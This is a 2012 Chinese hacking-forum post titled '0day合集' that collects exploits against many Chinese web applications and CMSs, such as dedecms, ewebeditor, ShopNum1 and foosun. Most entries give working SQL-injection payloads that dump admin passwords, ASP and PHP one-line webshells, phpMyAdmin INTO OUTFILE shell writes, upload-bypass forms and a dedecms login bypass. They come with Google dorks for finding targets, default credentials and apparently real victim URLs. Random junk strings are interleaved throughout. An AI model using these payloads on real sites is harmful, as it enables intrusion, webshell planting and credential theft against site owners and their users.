中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
, K+ ^; \5 T+ ^5 W* _
. ]8 k4 m8 a: R9 A1 o' `
直接上exploit:
# J [. _( x4 l; o1 `
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
9 b' U5 m0 `( z+ K
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
9 x5 T. [& _: |* U# u( z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( g% o7 W$ t9 g" T' y% `, C2 G* W- W
Asprain论坛 注册用户 上传图片就可拿到webshell
0 r, j& m2 X0 z: B/ q; J6 h& h
/ i0 Q) i' H3 i+ c3 F6 [; O% ]& P
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
9 \: t7 B3 N4 _) ~' D" t
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
$ P4 N% z# G D) r- G* z, O) `
2.gif 为一小图片文件,一定要小,比如qq表情图片
" ^/ t* Q! S8 {$ Y# U2 s
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
) N' d4 X- t1 I$ p/ U9 F, S4 |
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
- _: B j ~0 |6 @
5.q.asp;.gif
! m! W& ^5 M- k5 T4 r
google:Powered by Asprain
& {$ ^$ c/ [% t7 E; C* ^/ D3 g3 X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" h6 I# _+ k) S# z! e& G
* v. {4 j0 S; r# p. _7 {9 y
ShopNum1全部系统存在上传漏洞。
/ l3 M$ u: W1 `7 I& s( L
# r2 S! |0 K' I+ D8 D6 c
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
& g' `( p7 @9 ~( O
按说明 提示登录后台。。
) c3 j7 ~3 O; T$ e# g7 l
在后台功能页面->附件管理->附件列表
) O* e' [$ \, b9 y
可以直接上传.aspx 后缀木马
) e- l: c4 h! {8 {/ P$ g
http://demo.shopnum1.com/upload/20110720083822500.aspx
! ?) A d0 T5 b7 D1 n( b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 P, |" n( b% S1 @& a
+ b y6 _# f- H4 y* G# f( f
牛牛CMS中小企业网站管理系统 上传漏洞
* d" ?5 Z. p4 w0 e7 t( ?( y; f
/ W! p/ m0 }( f* k
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
! a9 m% g/ W6 t" r) m/ D+ y
后台:admin/login.asp
% _4 b1 R! F h9 p
ewebeditor 5.5 Nday
% K6 _' C; n+ S! H2 E
exp:
. C% e3 V; Y' [+ |/ u& p
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
. e3 P w$ X; k# T
<input?type=file?name=uploadfile?size=100><br><br>?
8 I7 M5 O1 U# r
<input?type=submit?value=upload>?
, h, n$ o: Y7 @0 Y8 N4 S
</form>
+ c# u8 N/ B3 M2 _
ps:先上传小马.
3 ?/ {$ p5 t9 L0 H+ m5 c) x: C5 s
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
! h( p5 L/ n' v: \5 k# s; ^: w
% Z$ B5 g5 G7 b4 A" ~& j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 S! _1 e9 `, O0 p+ [
' b/ a2 ?# P. C4 p9 u
YothCMS 遍历目录漏洞
" C3 u: `* M/ F: Z' {( u
6 n+ }! K! K7 h0 E ~* t
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
/ h6 O) d1 z0 i. \3 |
默认后台:admin/login.asp
& G1 y- d: }2 Z4 R) W5 g5 y% Z
遍历目录:
/ W3 S) {- a M3 P, ~" v9 T
ewebeditor/manage/upload.asp?id=1&dir=../
& U2 X$ c" m- ]! ^3 B6 q* w1 J# x
data:
# ^% z0 A2 Q8 d7 |+ T9 K
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
* f2 m6 d4 Q) A3 q" J( E+ r/ P. `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ p; ] D( ]: n, p/ F
6 {* P$ S2 }& T" Z$ o3 \! ]4 k
Net112企业建站系统 1.0
: C. G4 X) C$ ~# b# ^
8 b! N8 [. z6 f( F# i6 r& }
源码简介:
( D* x- o( _! \, m% q" y3 ]
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
2 o4 F3 [; B* B' Y6 i
添加管理员:
* U9 F" {% R- a: x% M) \
http://www.0855.tv/admin/admin.asp?action=add&level=2
2 h. {: f" a; V9 v! i! c+ |
其实加不加都不是很重要,后台文件都没怎么作验证。
& ]2 D2 c$ A( N! V
上传路径:
0 w0 B0 }" I8 |* `. _
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
1 a& Y+ W; X/ l
http://www.0855.tv/inc/Upfile.asp?Stype=2
3 v/ |" k- x8 L3 F
怎么利用自己研究。
; e5 {! A4 s7 C8 m' ^
遍历目录:
4 E) X# B: }/ R8 [4 m
http://www.0855.tv/admin/upfile.asp?path=../..
/ N. ~4 Y% E8 f R; O
如:
4 t; a! T. h: y! L6 U9 h
http://www.0855.tv/admin/upfile.asp?path=../admin
% c& w. l O. R
http://www.0855.tv/admin/upfile.asp?path=../data
) G/ q* L& I; o' Z d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: w& b% ~2 Y* U; U+ h) N1 M$ r6 Y
; Y6 K9 P( ^7 M' X& p( M4 a
易和阳光购物商城通杀 上传漏洞
5 ?. W. i' W1 V
9 Z. {; {6 o4 r2 x; {4 Z
前提要求是IIS6.0+asp坏境。
! [" U1 w: o! ?# {
漏洞文件Iheeo_upfile.asp
" e1 c0 ]9 [1 z% `4 ~
过滤不严.直接可以iis6.0上传
3 C; b9 N* }2 X1 j
把ASP木马改成0855.asp;1.gif
& V( t9 {8 t# @& R5 P6 }# f' c
直接放到明小子上传
* h+ k- h. r8 j: ~7 w
Google搜索:inurl:product.asp?Iheeoid=
$ y/ R( o5 @& T* v/ N& S$ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# {# \$ x. o- a% H' i
2 D, i# F3 K$ {
phpmyadmin后台4种拿shell方法
|4 n& R1 A6 ` g/ D8 V/ m
+ V7 k6 F8 l2 s
方法一:
8 F3 C3 y: t, }' M
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
6 z/ e5 P0 ^' c+ r* Q( w
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
, {8 v4 G! X& z" @7 I. v
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 k( Z! ?; w4 Z ]1 s+ H
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
* a* ]* S( Y6 W8 Z! a4 Y. |! `; b
一句话连接密码:xiaoma
) G' g( b- |( Q$ K. ], T: \' S
方法二:
4 q6 }5 s3 M3 f" X
Create TABLE xiaoma (xiaoma1 text NOT NULL);
. g: T! W. a/ J) ~
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
y2 T$ _$ U t+ f* L& @2 d
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
2 m1 ^0 R4 Z/ h2 R
Drop TABLE IF EXISTS xiaoma;
4 x" J y4 g4 Z) c% n
方法三:
% w3 U; \2 v! f$ z
读取文件内容: select load_file('E:/xamp/www/s.php');
! J* u2 ]: G' a7 C# L
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' ` r% j8 D T& b2 O
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: P p, c0 g6 k7 o1 g: Y
方法四:
# }4 F5 _% h: r- _ t5 Y l
select load_file('E:/xamp/www/xiaoma.php');
5 R7 d L q# Z
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 @9 I5 v+ H7 v
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
( P1 [3 I: h5 M3 z7 ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# o2 U, h7 ]1 o h, H
5 O/ o, \" f( _) a
传信网络独立开发网站源码0day漏洞
. x! K* N% w0 J5 B2 J. z
; g. z' _" _6 M
后台system/login.asp
% l5 _- c' O1 t( o8 y% ^" T: ?( w
进了后台有个ewebeditor
8 U) Q: x: W: B
Google 搜索inurl:product1.asp?tyc=
. m* G! o$ G( ]5 k: ]: O3 y
编辑器漏洞默认后台ubbcode/admin_login.asp
' k7 M( c& `0 F+ R& O& ?+ `3 X
数据库ubbcode/db/ewebeditor.mdb
5 I, @/ C. F. ?. f) A: W D! ?# [
默认账号密码yzm 111111
+ ?& w3 z' V' ~* {" ~
1 N8 T/ y) c" m8 f/ R4 P" W
拿webshell方法
8 b0 S& Y3 Y. B% z* [
登陆后台点击“样式管理”-选择新增样式
, x* l/ L) \. n
样式名称:scriptkiddies 随便写
: z- @1 B- N, ^8 @
路径模式:选择绝对路径
1 g3 A' m+ _6 }+ ?
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, v$ s1 M# ~1 ?) n" H
图片类型比如就是我们要上传的ASP木马格式
( r; v \8 g; M0 ?( R
上传路径:/
* `1 ] P3 j0 i; @' i
图片限制:写上1000 免的上不了我们的asp木马
5 e9 {" w" G- i7 l, u
上传内容不要写
1 @: Y4 ~' r* ~: u$ c- H5 i
可以提交了
# R9 H* B; ?% C8 v; O$ X# M
样式增加成功!
- a9 |) j( e: {- w! \0 S. c7 y0 y0 F
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
* q7 }4 G; L; H* b
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
# F5 S; @& S5 N5 H
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
/ l4 l8 M9 E- |4 @: L
上ASP木马 回车 等到路径
A7 M' k( f% ^( S* B- v' `* Z% ]
. E/ d* M6 j) t
后台:system/login.asp
3 |2 d& s. I: a
Exp:
: G+ L( b" s! D; ]# t( \( A, @; p5 l/ ^
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 |9 p$ ]# b# z. I: q3 _$ N! u
测试:
2 Y7 h8 n6 Q4 d& w5 k7 T* S
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
6 U. |! n' W7 E6 r1 u& n# a
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
) M8 `- Q9 o$ I I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|# S. }" m" v/ x3 n" e/ a, A& A$ [
5 b/ P1 E% C6 B( X) C( V; ^
foosun 0day 最新注入漏洞
9 Q' i* y: w3 r4 e) w0 d
1 i; y) J: N# q# m, d- ]9 H
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
+ }8 v- W, z4 o, R
利用简单的方法:
/ k2 ^: T3 l! ^6 }9 j; q
暴管理员帐号:
$ q! `+ X7 ~+ M* Y. k; h, M# ]( }2 Z8 c% L
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
* ?! r) N3 ]7 t7 C; _
暴管理员密码:
; y$ b; {; Q: _. F
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
; B; D3 Q" Z" l: O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 L" b/ R; c i- _' P- h5 {
( z3 D7 @3 o1 {+ G# Z6 Y9 ` L
网站程序的版权未知!
) E5 D7 z! Y: \( K$ g- f
) g$ ^" l& P- ?1 C, l
默认网站数据库:
, B8 d, z# `3 t& p$ K7 x5 S
www.i0day.com/data/nxnews.mdb
. d3 n; {5 D! I
ewebeditor 在线编辑器:
1 \ p3 m, c- V- D- p
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
5 A, @; `! T! F+ _/ k, Y. r
登录地址:ewebeditor/admin_login.asp
& |. C" \5 }: ~# m; u
默认密码:admin admin
4 A+ U/ h" n( ^0 h. m0 @9 F9 E `5 p
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
/ c. n) |0 T' @) E* E
4 G2 A' p1 l. z7 j o3 _
Sql注入漏洞:
* |$ A0 l B* D0 ]
http://www.i0day.com/detail.asp?id=12
% A9 N5 w$ w7 P" `2 m6 u) o
exp:
# E0 D+ y! P; h$ Z
union select 1,admin,password,4,5,6,7,8 from admin
% v8 g* ?5 | x: r0 O$ d2 C, g
爆出明文帐号/密码
. y5 ]( v; J' r; f' z. q
/ [! d- l$ r2 Z9 |, y
上传漏洞:
. K7 W0 w" O0 I
后台+upfile.asp
3 T6 u; S: Z2 t+ o" u" \
如:
( v% h% y9 c$ S0 e) y
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
3 a" ~9 {8 N6 J {
shell的地址:网址+后台+成功上传的马
) d2 v. K( m0 z B: g
google:inurl:news.asp?lanmuName=
q1 s0 S8 D. q) e. n4 b& [+ h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; X! T2 z3 L B/ K
* w! f3 Z9 `: X: z. Z+ J# B& F! L
dedecms最新0day利用不进后台直接拿WEBSHELL
: z" [, q' W& ?
/ R- S8 e/ R' r% o
拿webshell的方法如下:
4 m0 i& q3 b8 {
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
6 W0 k& f' l! C3 f1 V
前题条件,必须准备好自己的dede数据库,然后插入数据:
0 R: P" J0 F/ j2 Z( s) L
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
. v! X p) V3 j1 j
' g8 I( n+ d9 E4 D% N7 T
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 ~" f; n- I9 Q* F/ c: i7 M b
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
, x5 h, b+ e/ _* `
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 c3 i# G& j2 V4 p* n1 L- I
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
, |: v' q! P q6 l
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
' n) n. ^$ y, |7 y9 H
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 @! i* `4 i E
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
$ H# k' c. F3 @; F+ j) f. |
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 \5 L: C5 M" x# N2 X
<input type="text" value="true" name="nocache" style="width:400">
0 Y" t- ~/ H- _0 _/ [1 A6 h: ^ _
<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 d) ~+ `, p2 d
</form>
3 @3 u# d6 V6 }/ n: [+ g& {
<script>
1 Z4 a8 r+ y1 v
function addaction()
' p0 h' f/ N( p; A. o
{
) ~0 y- y: q3 \4 L7 h
document.QuickSearch.action=document.QuickSearch.doaction.value;
2 v# [9 u, Z" t( Q
}
' O s. X8 \( Y
</script>
% Y" L. A) d; @4 y5 y0 W# g
-----------------------------------------------------------------------------------------------------------------------------------------------
2 o4 h$ b y" w. e* `' ]. g
+ a M: i: P$ N/ W# z
dedecms织梦暴最新严重0day漏洞
2 z5 Q3 S: `6 J' O6 j+ D' B
bug被利用步骤如下:
6 p( U) B/ a$ O$ u2 m8 H3 ^2 x* _
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
& f S6 p, W4 c7 J$ f
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 q# U; P- k" L4 `$ c+ I# V6 G+ B
-------------------------------------------------------------------------------------------------------------------------------------------
& H$ m" [8 A0 C* q8 X1 v
# z. w' ^6 z4 T- ^* {/ |
多多淘宝客程序上传漏洞
[% t7 E7 Y+ N* ]+ G: _6 t
漏洞页面:
( p+ E O, A( V: f
admin\upload_pic.php
x8 @; R: J- Z0 u
传送门:
% [) _8 H- L% a: i2 W! y
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
& w. N' m; w) R
PS:copy张图片马 直接 xxx.php 上传抓包地址!
; O6 W% r! U( ?* p6 Z4 H
------------------------------------------------------------------------------------------------------------------------------------------------------
( e4 X p* Z; ^+ }! E1 H& W6 N
: p$ `& ^) q0 K1 k9 }/ u& F4 y
无忧公司系统ASP专业版后台上传漏洞
6 s6 m1 G! l' b' ~( B3 |3 ?
漏洞文件 后台上传
$ l9 b% I4 _0 R" Y6 O
admin/uploadPic.asp
9 ~" C3 V( w/ i' d* ?1 X
漏洞利用 这个漏洞好像是雷池的
& j9 U4 U3 }: i- W7 e2 G8 n
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
# m A0 t" d% Z/ D/ b9 ?0 b
等到的webshell路径:
/ i- b" e9 \0 g; p7 i
/UploadFiles/scriptkiddies.asp;_2.gif
8 T7 a* h4 A( ?6 m% `
---------------------------------------------------------------------------------------------------------------------------------------------------
" _* a) m3 H$ a; { z; x, s" g5 u' A2 \
- E5 V( D+ U8 M# K/ ?1 t6 f, B& v
住哪酒店分销联盟系统2010
* D) K) g: W" x, I2 ^
Search:
& @ ^. T6 }5 Z1 I3 r4 j: { y' ^
inurl:index.php?m=hotelinfo
/ i/ p/ F4 H( o
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# G$ p& ^ B8 B# p2 F
默认后台:index.php?m=admin/login
2 g# z+ @ M' Z1 C7 V( @3 @
--------------------------------------------------------------------------------------------------------------------------------------------------
( Q6 @4 b8 E' h0 E& O* ~! f8 N- A
8 H# t- _1 {. Y$ P# A- F
inurl:info_Print.asp?ArticleID=
$ o9 z- X, M# X
后台 ad_login.asp
6 G' Z% ?* L* ^% f8 d% F
爆管理员密码:
1 j. X r4 j+ D3 P3 C
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
1 `( x0 r* H, c' {* \
------------------------------------------------------------------------------------------------------------------------------------------------------------
9 a8 u( L2 {: M: m% w
8 O- A: V r H, J9 H
搜索框漏洞!
* v1 b/ ?" P0 p
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
. p% o) O, I o4 Z& m# E
--------------------------------------------------------------------------------------------------------------------------------------------------------
# b" j4 E! b& c" ?( s
$ C6 J2 y. K/ O5 \3 r
关键字:
- U; v& e# O2 I5 p7 B! f9 [4 [
inurl:/reg_TemletSel.asp?step=2
4 e! M0 g( n8 f& y& \. |& i
或者
0 f: \* k8 V, X7 A' a
电子商务自助建站--您理想的助手
7 Z. k9 u( ?4 U$ \7 n% ~; R
-------------------------------------------------------------------------------------------------------------------------------------------------
P, x9 p9 K" G. g- ~
$ p( B* o2 Z6 k
iGiveTest 2.1.0注入漏洞
* E2 p% Q {$ J
Version: <= 2.1.0
$ k3 D5 f5 R+ T7 U5 d; n/ d
# Homepage:
http://iGiveTest.com/
/ ^" q3 z- a4 i% `
谷歌关键字: “Powered by iGiveTest”
9 M" l/ X0 q" ^+ x, W
随便注册一个帐号。然后暴管理员帐号和密码
0 A+ ], z* `' n0 m. P, a, o: |
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
8 a/ D( P, O; S& s
------------------------------------------------------------------------------------------------------------------------------------------------
5 a5 m3 x$ O) ?( @
6 P, @& C7 f& D" \1 x, }" G1 z
CKXP网上书店注入漏洞
+ A* Q" W5 a1 d& N! l1 l
工具加表:shop_admin 加字段:admin
9 j& D, a3 L* c5 x8 T3 F
后台:admin/login.asp
/ J% x+ E( X7 s+ u2 J+ H
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
) {) I* E0 N5 ]# s
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
P- ^: [" U' [ A K- G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 u" P- W9 e" s' k5 W- I5 E
5 b5 y' f$ r6 c0 z7 p
段富超个人网站系统留言本写马漏洞
$ S9 g6 y8 \' _
源码下载:
http://www.mycodes.net/24/2149.htm
4 Y {2 I! X1 L0 H4 b8 P
addgbook.asp 提交一句话。
8 P. c* M# o4 _0 d$ v
连接:
http://www.xxxx.tv/date/date3f.asp
2 ?: b( W3 N) D- e2 ^5 m; ^
google:为防批量,特略!
/ V5 [$ l) e2 p% G4 K1 H
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 W/ v1 ^& g. Q7 {# z P
* n3 |- C$ M; O5 m/ h0 i
智有道专业旅游系统v1.0 注入及列目录漏洞
8 i) j( u# W& R* u0 l$ P
默认后台路径:/admin/login.asp
) T1 t8 o, y& N, H) I
默认管理员:admin
9 p: }: x5 \% z& K6 p# {7 q- [
默认密码:123456
1 y% R, l" z% [& K" I; T- {0 V
SQL EXP Tset:
$ m& C# ?- j2 A. U1 k- f! w3 |- B/ A I+ M
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
" Y+ m( L/ b5 ^: ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" u4 |1 g+ T* ]$ Y" d7 o+ x
8 ^1 h- T! | _' U* m
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
+ `! S, {+ D* D
EXP:
0 ~ b) [. w5 |0 V; C2 A
<title>eWebeditoR3.8 for php任意文件上EXP</title>
9 Z( Q u5 i5 Q0 Y% S7 H$ {7 ?
<form action="" method=post enctype="multip
7 Q; Z2 Z4 c! C; \; O
art/form-data">
" }& p% V/ S+ A2 w
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
# _: E; |& Q3 h
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
1 R! h6 G) c- I3 `5 m$ k
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
" S6 H! Z: M# g# Y) }" K. d3 Q1 E+ j- q
file:<input type=file name="uploadfile"><br>
" ]; Z+ I z% y4 i8 K
<input type=button value=submit onclick=fsubmit()>
3 M8 m: u; Y! b/ \$ u
</form><br>
6 b5 S/ B$ A4 }
<script>
! Q" J+ Z2 I) f- _- ?
function fsubmit(){
; j: W# Z6 }8 ^8 O
form = document.forms[0];
% o- x; t; L$ X/ B
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
: r) E U- s M8 c4 Q7 t" c
alert(form.action);
8 ?& y7 t, ~! _6 I- n
form.submit();
$ K: u, p+ _) U1 j+ E
}
6 x% ^# {6 H6 e5 `; T/ }" i
</script>
3 O2 C% T! \/ p' M8 o3 ]$ e4 X9 ^
注意修改里面ewebeditor的名称还有路径。
$ o. x6 T, a; r( X( T
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) ~7 Y: h$ c0 v9 h& g& A/ N! M
. Y1 o2 J7 @1 p+ g" T
提交’时提示ip被记录 防注入系统的利用
; X1 \# X3 [# b% V3 c8 h" X+ f
网址:
http://www.xxx.com/newslist.asp?id=122
′
" v+ h1 i0 z4 q& o
提示“你的操作已被记录!”等信息。
4 o9 c, x, o8 O* R( S
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
- n- R( E; f& F& m0 C+ j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 n' j: I! x2 A' u8 Q- t
+ B( H/ N5 w' h3 s& A4 @
西部商务网站管理系统 批量拿shell-0day
7 U4 Z" G }4 J- b8 e7 `0 W: v1 P, [
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
- @, J' f; \# @& D9 _, t: d" O
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
# s+ c3 _ ]( B4 D* A
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
$ x; ~) L) @ s8 \7 ]6 y" Z) M R, m
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
. r! l Y$ s8 {0 g! U: N
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
P) ?" h5 } d: R; A& J& R+ l
6 j5 T& Q+ M2 ^8 K
JspRun!6.0 论坛管理后台注入漏洞
) v* n0 @ M- X+ s+ ~& E4 t4 F
( m: M- b4 u6 z9 i2 Z" }8 R7 Y- O
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
% |7 {+ ^( C: F
JspRun!6.0
; ?: i7 i7 d5 R
漏洞描述:
' R1 d+ {8 Z) ?" N. n8 Q
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
K, {- z* e" d; Y4 {
在处理后台提交的文件中ForumManageAction.java第1940行
$ H$ a4 n8 O! ^
String export = request.getParameter("export");//直接获取,没有安全过滤
4 t! \4 E9 N z$ t
if(export!=null){
5 H) V% D, P! p2 g; d
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
' o0 t% [' b2 Q# h1 S! `1 V
if(styles==null||styles.size()==0){
. U& @ ~+ A4 X& j
<*参考
) B! z3 _3 z+ ~) N& k; F
nuanfan@gmail.com
) a3 C! X6 `. D5 H2 c
*> SEBUG安全建议:
' f0 ?8 h! i7 Z, Q- u* y$ M3 u+ D a
www.jsprun.net
4 }! o' r/ s# N
(1)安全过滤变量export
8 S7 A: K0 V- b' D' C: J! t
(2)在查询语句中使用占位符
+ y. Y0 Y' m- G7 C; t+ |+ [/ h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) F; _2 ` @: Y4 Q
- X1 [+ D0 X' d7 X
乌邦图企业网站系统 cookies 注入
0 M5 F% Y9 z0 S. T
3 N$ q O( d! @0 \5 k' U1 k
程序完整登陆后台:/admin/login.asp
) W$ c( c6 d1 ^, H: `8 S
默认登陆帐号:admin 密码:admin888
1 w$ i% ]9 _2 ?3 s3 q* N! a7 W& R, t
语句:(前面加个空格)
& |+ p) G* u9 B6 f
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
/ F# s! l A6 R# r
或者是16个字段:
2 W% r& j$ J- e8 H* G. y: N
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
; g2 H: [& Y6 \! G+ ]
爆不出来自己猜字段。
8 ~' P/ `: d4 h/ P5 }: g( T
注入点:
http://www.untnt.com/shownews.asp?=88
# D. f" p7 Z- }" d9 o
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
2 s/ R4 j: p$ t5 u& I
关键字:
( {' R% _( B& D% ~/ @
inurl:shownews?asp.id=
. U- k, F& Y2 S, O, t9 n
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) J1 B, `1 B) @6 ^) [
$ C5 k9 p+ K" d$ @6 |
CKXP网上书店注入漏洞
1 h( Q" [5 Q. ~! n" E8 _' [6 Z) ?% u+ v
/ k/ s' ?" S8 d( R4 v% q+ W
工具加表:shop_admin 加字段:admin
! `9 @0 }9 G/ Z6 h4 v4 `/ |
后台:admin/login.asp
T% S& M) v) G! _
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
; o: L0 j b/ H w1 I7 N$ c
